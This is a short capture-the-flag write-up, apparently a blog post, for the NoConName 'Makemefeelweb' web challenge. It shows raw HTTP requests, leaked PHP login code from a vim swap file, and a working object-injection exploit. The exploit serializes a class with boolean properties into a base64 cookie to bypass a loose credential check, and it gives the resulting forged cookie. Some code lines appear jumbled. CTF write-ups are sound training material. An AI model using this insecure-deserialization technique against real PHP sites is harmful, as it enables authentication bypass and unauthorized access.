Makemefeelweb( solved by kami)
GET /makemefeelweb/index.php HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/login.php
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Hint comment found in top of the page : (Emac config)
<!-- vim: set ts=2 sw=2: --> <== @ HINT@already check it i think it means tabstop=2 and shiftwidth=2
tab width and code indent width.
<html>
<head>
<link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
<script src="assets/jquery-1.11.1.min.js"></script>
<script src="assets/bootstrap/js/bootstrap.min.js"></script>
<title>WUT</title>
</head>
t's emac vuln
here a incomplete backup https://ctf.noconname.org/makemefeelweb/.login.php.swp
@$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));
if (isset($_COOKIE['JSESSIONID'])) {
if ($username == "p00p" && $password == "l!k34b4u5") { } }
$this->p = $_passwd; $this->u = $_uname;
class Creds {
public function __construct($_uname, $_passwd) {
public $p;
public $u;
Exploit :
class Creds {public $p = true;public $u = true;}
$exploit=new creds;echo base64_encode(bin2hex(serialize($exploit)));
POST https://ctf.noconname.org/makemefeelweb/login.php HTTP/1.1
Content-Length: 30
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=
username=p00p&passwd=l!k34b4u5
NcN_7780*************************eba1578
No comments:
Post a Comment